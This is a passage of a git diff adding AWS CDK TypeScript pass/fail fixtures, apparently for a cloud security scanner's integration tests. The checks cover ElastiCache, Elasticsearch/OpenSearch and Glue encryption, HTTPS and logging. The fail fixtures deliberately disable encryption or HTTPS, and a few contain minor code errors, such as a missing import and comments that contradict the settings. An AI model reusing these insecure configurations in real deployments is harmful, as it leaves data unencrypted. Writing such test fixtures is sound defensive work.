+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts
new file mode 100644
index 00000000000..88c7cb06edf
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts
@@ -0,0 +1,18 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+            transitEncryptionEnabled: true,
+            authToken: 'token'
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts
new file mode 100644
index 00000000000..4f659d06f6b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts
@@ -0,0 +1,18 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+            authToken: 'token',
+            transitEncryptionEnabled: true,
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts
new file mode 100644
index 00000000000..138b39f78ad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new es.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts
new file mode 100644
index 00000000000..b3febce0dd8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new opensearch.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts
new file mode 100644
index 00000000000..e8e7c14606f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new es.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4,
+            enforceHttps: true
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts
new file mode 100644
index 00000000000..04a16447c29
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new opensearch.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4,
+            enforceHttps: true
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts
new file mode 100644
index 00000000000..138b39f78ad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new es.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts
new file mode 100644
index 00000000000..b3febce0dd8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new opensearch.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts
new file mode 100644
index 00000000000..75a421483ad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts
@@ -0,0 +1,19 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new es.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4,
+            logging: {
+                appLogEnabled: true
+            }
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts
new file mode 100644
index 00000000000..ace545f9316
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts
@@ -0,0 +1,19 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const domain = new opensearch.Domain(this, 'Domain', {
+            version: es.ElasticsearchVersion.V7_4,
+            logging: {
+                appLogEnabled: true
+            }
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts
new file mode 100644
index 00000000000..46d623cac8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts
@@ -0,0 +1,13 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import {aws_elasticsearch as elasticsearch} from 'aws-cdk-lib';
+
+const encryptionAtRestOptionsProperty1: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = {
+    enabled: false,
+    kmsKeyId: 'kmsKeyId',
+};
+
+let encryptionAtRestOptionsProperty2: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = {
+    enabled: false,
+};
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts
new file mode 100644
index 00000000000..1f21305d959
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts
@@ -0,0 +1,15 @@
+import {aws_elasticsearch as elasticsearch} from 'aws-cdk-lib';
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    encryptionAtRestOptions: {
+        enabled: false, // Enable encryption at rest
+        kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID
+    }
+});
+
+const domain2 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    encryptionAtRestOptions: {
+        enabled: false, // Enable encryption at rest
+    }
+});
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts
new file mode 100644
index 00000000000..b16abdfb13b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts
@@ -0,0 +1,20 @@
+import * as cdk from 'aws-cdk-lib';
+import * as elasticsearch from 'aws-cdk-lib/aws-elasticsearch';
+
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    encryptionAtRestOptions: {
+        enabled: true, // Enable encryption at rest
+        kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID
+    },
+});
+
+const domain3 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    encryptionAtRestOptions: {
+        enabled: true, // Enable encryption at rest
+    }
+});
+
+const encryptionAtRestOptionsProperty3: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = {
+    enabled: true,
+};
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts
new file mode 100644
index 00000000000..82f51c622a7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts
@@ -0,0 +1,12 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const encryptionAtRestOptionsProperty1: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+    enabled: false,
+};
+
+let encryptionAtRestOptionsProperty2: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+    enabled: false,
+};
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts
new file mode 100644
index 00000000000..5cccf5fb078
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts
@@ -0,0 +1,15 @@
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    nodeToNodeEncryptionOptions: {
+        enabled: false, // Enable encryption at rest
+        kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID
+    }
+});
+
+const domain2 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    nodeToNodeEncryptionOptions: {
+        enabled: false, // Enable encryption at rest
+    }
+});
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts
new file mode 100644
index 00000000000..5d7d7e27f5f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts
@@ -0,0 +1,17 @@
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    nodeToNodeEncryptionOptions: {
+        enabled: true, // Enable encryption at rest
+    },
+});
+
+const domain3 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+    nodeToNodeEncryptionOptions: {
+        enabled: true, // Enable encryption at rest
+    }
+});
+
+const encryptionAtRestOptionsProperty3: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+    enabled: true,
+};
diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts
new file mode 100644
index 00000000000..338cd5710f0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts
@@ -0,0 +1,32 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import {aws_glue as glue} from 'aws-cdk-lib';
+
+const cfnDataCatalogEncryptionSettingsProps1: glue.CfnDataCatalogEncryptionSettingsProps = {
+    catalogId: 'catalogId',
+    dataCatalogEncryptionSettings: {
+        connectionPasswordEncryption: {
+            kmsKeyId: 'kmsKeyId',
+            returnConnectionPasswordEncrypted: false,
+        },
+        encryptionAtRest: {
+            catalogEncryptionMode: 'DISABLED',
+            catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+            sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+        },
+    },
+};
+
+let cfnDataCatalogEncryptionSettingsProps2: glue.CfnDataCatalogEncryptionSettingsProps = {
+    catalogId: 'catalogId',
+    dataCatalogEncryptionSettings: {
+        connectionPasswordEncryption: {
+            returnConnectionPasswordEncrypted: true,
+        },
+    },
+    encryptionAtRest: {
+        catalogEncryptionMode: 'DISABLED',
+        catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+        sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+};
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts
new file mode 100644
index 00000000000..ec4a7c8787f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts
@@ -0,0 +1,31 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnDataCatalogEncryptionSettings = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', {
+  catalogId: 'catalogId',
+  dataCatalogEncryptionSettings: {
+    connectionPasswordEncryption: {
+      kmsKeyId: 'kmsKeyId',
+      returnConnectionPasswordEncrypted: false,
+    },
+    encryptionAtRest: {
+      catalogEncryptionMode: 'SSE-KMS',
+      catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+      sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+  },
+});
+
+const cfnDataCatalogEncryptionSettings2 = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', {
+  catalogId: 'catalogId',
+  dataCatalogEncryptionSettings: {
+    connectionPasswordEncryption: {
+      returnConnectionPasswordEncrypted: true,
+    },
+    encryptionAtRest: {
+      catalogEncryptionMode: 'DISABLED',
+      catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+      sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+  },
+});
+
diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts
new file mode 100644
index 00000000000..4c2afb41366
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts
@@ -0,0 +1,31 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnDataCatalogEncryptionSettings = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', {
+  catalogId: 'catalogId',
+  dataCatalogEncryptionSettings: {
+    connectionPasswordEncryption: {
+      kmsKeyId: 'kmsKeyId',
+      returnConnectionPasswordEncrypted: true,
+    },
+    encryptionAtRest: {
+      catalogEncryptionMode: "SSE-KMS",
+      catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+      sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+  },
+});
+
+const cfnDataCatalogEncryptionSettingsProps: glue.CfnDataCatalogEncryptionSettingsProps = {
+  catalogId: 'catalogId',
+  dataCatalogEncryptionSettings: {
+    connectionPasswordEncryption: {
+      kmsKeyId: 'kmsKeyId',
+      returnConnectionPasswordEncrypted: true,
+    },
+    encryptionAtRest: {
+      catalogEncryptionMode : "SSE-KMS",
+      catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+      sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+    },
+  },
+};
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts
new file mode 100644
index 00000000000..785ee2482a9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts
@@ -0,0 +1,153 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1:  glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps2: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps3: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps4: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps5: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps6: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps7: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps8: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps9: glue.CfnSecurityConfigurationProps = {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+};
+
+const cfnSecurityConfigurationProps10: glue.CfnSecurityConfigurationProps =  {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+};
+
+
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts
new file mode 100644
index 00000000000..71e304ded6a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts
@@ -0,0 +1,153 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration4 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration5 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration6 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration7 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'DISABLE',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration8 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "DISABLE" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration9 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }],
+  },
+  name: 'name',
+});
+
+const cfnSecurityConfiguration10 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
+      jobBookmarksEncryptionMode: 'CSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }],
+  },
+  name: 'name',
+});
+
+
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts
new file mode 100644
index 00000000000..fe0e51f8b5e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts
@@ -0,0 +1,52 @@
+import { aws_glue as glue } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', {
+  encryptionConfiguration: {
+    cloudWatchEncryption: {
+      cloudWatchEncryptionMode: 'SSE-KMS',
+      kmsKeyArn: 'kmsKeyArn',
+    },
+    jobBookmarksEncryption: {
